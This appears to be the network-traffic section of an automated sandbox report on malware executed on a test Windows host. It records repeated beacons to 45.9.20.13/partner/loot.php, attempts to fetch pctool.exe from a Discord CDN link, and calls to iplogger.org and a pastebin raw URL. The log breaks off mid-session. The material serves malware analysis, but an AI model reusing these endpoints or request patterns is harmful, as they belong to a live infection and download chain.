33 | 192.168.2.4 | 60078 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:11.684684992 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 60082 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:15.708468914 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 60085 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:20.270778894 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 60088 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:24.286206961 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 60091 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:28.304342031 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 60093 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:33.303833008 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 60097 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:37.315577984 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 60101 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:41.617697954 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 60103 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:45.645688057 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 60106 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:49.659532070 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 60110 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:53.676177025 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 60113 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:57.847359896 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 60115 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:01:01.863835096 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 60118 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:01:06.001876116 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-21 08:57:10 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
    Host: cdn.discordapp.com
    Connection: Keep-Alive
2024-08-21 08:57:10 UTC | 1047 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 21 Aug 2024 08:57:10 GMT
    Content-Type: text/plain;charset=UTF-8
    Content-Length: 36
    Connection: close
    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
    Set-Cookie: __cf_bm=AfndMd6V.01zjDiumP1PeZVw9D3mvKbYwSxt1mf4OCc-1724230630-1.0.1.1-Su3GzT_pD9Fd2iir70fJfh6iPQXBLIjlmncMkZj1espOH5eZjMkNvoYB2y22bW8fmUFV3kaNOu3P1T1jJXDenw; path=/; expires=Wed, 21-Aug-24 09:27:10 GMT; domain=.discordapp.com; HttpOnly; Secure
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbZHdRtMfj5bkjpOb%2FzbDVaL5UULNkIIWIl%2FXd449UHwSnz7ZV0luAlfszeirf7ZADcAxCHGgmAjuL2JC5gAPhfupHzk5XCQy7BGQfaT4gLz4L3caoPdoR4rzuDW9v0781jT%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Set-Cookie: _cfuvid=kDH.E_8UF2IoEITcXP_U.dJxTq9jfJMUGZtrXg380is-1724230630799-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8b696a026e8f43cb-EWR
    alt-svc: h3=":443"; ma=86400
2024-08-21 08:57:10 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
    Data Ascii: This content is no longer available.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 59938 | 172.67.132.113 | 443 | 8136 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-21 08:57:15 UTC | 87 | OUT | GET /1a2jd7 HTTP/1.1
    User-Agent: m1011
    Host: iplogger.org
    Connection: Keep-Alive
2024-08-21 08:57:15 UTC | 1018 | IN | HTTP/1.1 200 OK
    Date: Wed, 21 Aug 2024 08:57:15 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: close
    set-cookie: 30189073137263905=3; expires=Thu, 21 Aug 2025 08:57:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
    set-cookie: clhf03028ja=8.46.123.33; expires=Thu, 21 Aug 2025 08:57:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
    memory: 0.42942047119140625
    expires: Wed, 21 Aug 2024 08:57:15 +0000
    Cache-Control: no-store, no-cache, must-revalidate
    strict-transport-security: max-age=31536000
    x-frame-options: SAMEORIGIN
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xkL5k8z2m3SoN%2F9FaOo5qbfyhxrY4V2hgWTyr08BEejMHl6DqRRaxeCfYPszhOmslXDsly5CkaCNRFbk5gLQL1FGG4gt22BnnuXCYY51YZLCYaCXTedAMubl4vMWTU%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b696a1daaddc32a-EWR
    alt-svc: h3=":443"; ma=86400
2024-08-21 08:57:15 UTC | 122 | IN | Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
    Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-08-21 08:57:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.459940172.67.132.1134438136C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:16 UTC44OUTGET /1a3jd7 HTTP/1.1
                                      Host: iplogger.org
                                      2024-08-21 08:57:16 UTC1029INHTTP/1.1 200 OK
                                      Date: Wed, 21 Aug 2024 08:57:16 GMT
                                      Content-Type: image/png
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      set-cookie: 30189074137263905=3; expires=Thu, 21 Aug 2025 08:57:16 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                      set-cookie: clhf03028ja=8.46.123.33; expires=Thu, 21 Aug 2025 08:57:16 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                      memory: 0.41204833984375
                                      expires: Wed, 21 Aug 2024 08:57:16 +0000
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      strict-transport-security: max-age=31536000
                                      x-frame-options: SAMEORIGIN
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCt1LwJOv23g3JuLRAH6h5dy%2BoMOFzod12dDZKVm%2BOw389xnQfodtAqesLlKzo1onuK%2FoM5ddGBWT5RF7%2FWThF8aDbLLIwE6o%2F4HgAGsH%2Bjo%2FTby1cmUi7ZG5av%2FmzQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8b696a23ce7b4333-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:16 UTC | 122 | IN | Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                      Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                      2024-08-21 08:57:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.4 | 59942 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:16 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:16 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:16 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=Kf_VuceftkvZS0FPH4WUMRZQURdya_GLHzNI1zvjHyM-1724230636-1.0.1.1-r6Il9KxaCq4ZRPwxn7frVCAmPRFFrRIet8wSmHS7UwqEFeO.eFnUGttWsgmoF89kEnbFkHu4a2Xfeqd0nD_tgQ; path=/; expires=Wed, 21-Aug-24 09:27:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c9nez5obEMfbTn%2FXz243fxrIEoQqCXBEQheCbzHAITsf1sn58gbIwuBEI4h%2FZV8qZnKMYI4d1LgounAhGDgly8B18ltQE3UpfziRx1msT0kJwjl7mlueSuTOdRPsHQelIp%2FJOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=jD4ZsvDd9vq70OPT5ILhDKCp_PeGb1kJS__E3NpTPVo-1724230636877-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a286c9719c7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:16 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      4 | 192.168.2.4 | 59953 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:22 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:22 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:22 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=Vb4tNUszopoTKlKZCyzIQ9nbpFwgczMDsqzQz8Lfd.k-1724230642-1.0.1.1-7WwYIHnoE16UQljoMR6Qdu2Mc4CtrUDFK1zWrNEw99aK8F5Y50NaFU.79cEBagC9yQhQc2LNRnliFJPytWZxdg; path=/; expires=Wed, 21-Aug-24 09:27:22 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2B57LjwBbRJhiB%2B1yzh7MCmOVtH6mvDA6KF4v7IT4u7XR08Cpx6HZJAYKBja3BNHdC2y8ef5qy4p1Upavx6WfUg0G%2FcwHRjZAGpd23vdUdu42qfKAjHxnvQ8BB1mGh%2BEAOp1CQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=jJ_Aw6TKVgt4IWYlzPJYjZGyv5xjbxbQZx1WLIOYJSo-1724230642543-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a4bdec00f49-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:22 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      5 | 192.168.2.4 | 59962 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:28 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:57:28 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:28 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=rZ7VWVJTnKf5y6.8joyi_H0Z5j1_BcfGYSJpVIVcctw-1724230648-1.0.1.1-5TrN5OUCfTgRyoFnROqZ4O2Djew7SRKAZCsl8oGLCiv6WAhsD0uU884paD5iaTCSLvaVpCVyDzbcW4wH1uupdw; path=/; expires=Wed, 21-Aug-24 09:27:28 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yNyXCoxmfQjMYFr8wsYPf9IbqjpNKW3EJ2donBl4tCl%2BpCf89%2FSV2aNZ7zV0EqDqMDosm7eVtP524Nb2c8r60jTdkSKB1rR1J%2BJXcade%2FseV%2FqllNN9ph06g2MkOdPsdInfCiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=lkblbI.hdcugeqnkS.eoRPCLlkfg5IFBgzT7nhXC8Ko-1724230648181-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a6f181ac351-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:28 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      6 | 192.168.2.4 | 59963 | 172.67.19.24 | 443 | 7996 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:29 UTC | 202 | OUT | GET /raw/A7dSG1te HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                                      Host: pastebin.com
                                      2024-08-21 08:57:29 UTC | 439 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-frame-options: DENY
                                      x-frame-options: DENY
                                      x-content-type-options: nosniff
                                      x-content-type-options: nosniff
                                      x-xss-protection: 1;mode=block
                                      x-xss-protection: 1;mode=block
                                      cache-control: public, max-age=1801
                                      CF-Cache-Status: EXPIRED
                                      Server: cloudflare
                                      CF-RAY: 8b696a74afdf423f-EWR
                                      2024-08-21 08:57:29 UTC | 698 | IN | Data Raw: 32 62 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 30 2e 37 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 73 74 65 62 69 6e 2e
                                      Data Ascii: 2b3<!DOCTYPE html><html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.
                                      2024-08-21 08:57:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      7 | 192.168.2.4 | 59969 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:33 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:33 UTC | 1053 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:33 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=M2uO.1.PcACkGnZDsgrNCqmml2zVXqHzFQvKKBacpSE-1724230653-1.0.1.1-60ojZuLVEcG3c8NHRxN.kUPyVvY4lkWE8h.R3nFJlOGji1V1eG0dr04KsPo0x8EGiIZJEbBm2_IFicXSgatNJQ; path=/; expires=Wed, 21-Aug-24 09:27:33 GMT; domain=.discordapp.com; HttpOnly; Secure
